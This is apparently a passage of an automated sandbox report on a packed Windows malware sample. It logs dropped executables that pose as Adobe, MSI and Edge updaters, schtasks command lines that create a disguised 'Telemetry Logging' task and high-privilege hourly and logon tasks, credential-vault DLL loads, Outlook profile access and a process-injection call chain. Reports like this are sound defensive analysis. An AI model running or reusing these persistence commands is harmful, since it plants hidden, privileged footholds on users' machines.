Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe "C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe "C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe "C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe"
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: d3d11.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dxgi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dxcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: devobj.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: apphelp.dll
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: windows.storage.dll
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe Section loaded: ntmarta.dll
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Section loaded: apphelp.dll
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Section loaded: windows.storage.dll
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Section loaded: wldp.dll
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Section loaded: apphelp.dll
Source: EdgeMS2.lnk.0.dr LNK file: ..\..\..\..\..\..\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: file.exe Static file information: File size 4173312 > 1048576
Source: file.exe Static PE information: Raw size of .MPRESS1 is bigger than: 0x100000 < 0x3dec00
Source: Binary string: Z:\Development\Secureuser\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: file.exe, file.exe, 00000000.00000002.4535204352.000000000059F000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe Unpacked PE file: 10.2.VkHLTH_m2kErRb6vpA5n.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Unpacked PE file: 13.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Unpacked PE file: 14.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Unpacked PE file: 15.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe Unpacked PE file: 22.2.IQUKpYR1BFFsqw1YWBOv.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Unpacked PE file: 23.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Unpacked PE file: 24.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Unpacked PE file: 29.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Unpacked PE file: 32.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Unpacked PE file: 35.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Unpacked PE file: 38.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Unpacked PE file: 41.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Unpacked PE file: 42.2.EdgeMS2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418BB0 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 0_2_00418BB0
Source: initial sample Static PE information: section where entry point is pointing to: .MPRESS2
Source: file.exe Static PE information: section name: .MPRESS1
Source: file.exe Static PE information: section name: .MPRESS2
Source: l2[1].exe.0.dr Static PE information: section name: .MPRESS1
Source: l2[1].exe.0.dr Static PE information: section name: .MPRESS2
Source: VkHLTH_m2kErRb6vpA5n.exe.0.dr Static PE information: section name: .MPRESS1
Source: VkHLTH_m2kErRb6vpA5n.exe.0.dr Static PE information: section name: .MPRESS2
Source: AdobeUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS1
Source: AdobeUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS2
Source: MSIUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS1
Source: MSIUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS2
Source: EdgeMS2.exe.0.dr Static PE information: section name: .MPRESS1
Source: EdgeMS2.exe.0.dr Static PE information: section name: .MPRESS2
Source: k[1].exe.0.dr Static PE information: section name: .MPRESS1
Source: k[1].exe.0.dr Static PE information: section name: .MPRESS2
Source: IQUKpYR1BFFsqw1YWBOv.exe.0.dr Static PE information: section name: .MPRESS1
Source: IQUKpYR1BFFsqw1YWBOv.exe.0.dr Static PE information: section name: .MPRESS2
Source: AdobeUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS1
Source: AdobeUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS2
Source: MSIUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS1
Source: MSIUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS2
Source: EdgeMS2.exe0.0.dr Static PE information: section name: .MPRESS1
Source: EdgeMS2.exe0.0.dr Static PE information: section name: .MPRESS2
Source: oobeldr.exe.10.dr Static PE information: section name: .MPRESS1
Source: oobeldr.exe.10.dr Static PE information: section name: .MPRESS2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00703045 push 5EF45176h; mov dword ptr [esp], ebp 0_2_008F97B5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007020F7 push ebp; mov dword ptr [esp], esi 0_2_008F908B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007020F7 push edx; mov dword ptr [esp], 68A8A828h 0_2_008F909F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007020F7 push 047071F5h; mov dword ptr [esp], ecx 0_2_008F9171
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007020F7 push edx; mov dword ptr [esp], ebp 0_2_008F918B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007090FE push 609BC6DEh; mov dword ptr [esp], eax 0_2_008E98A1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007090FE push edi; mov dword ptr [esp], 2DFCA35Fh 0_2_008E98F7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007090FE push edi; mov dword ptr [esp], 0C6D5282h 0_2_008E9950
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007090FE push 70833598h; mov dword ptr [esp], ebp 0_2_008E996E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007080D4 push edx; mov dword ptr [esp], 6EFF823Dh 0_2_008F4F73
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007080D4 push edi; mov dword ptr [esp], ebp 0_2_008F4FF3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007080D4 push edx; mov dword ptr [esp], edi 0_2_008F5015
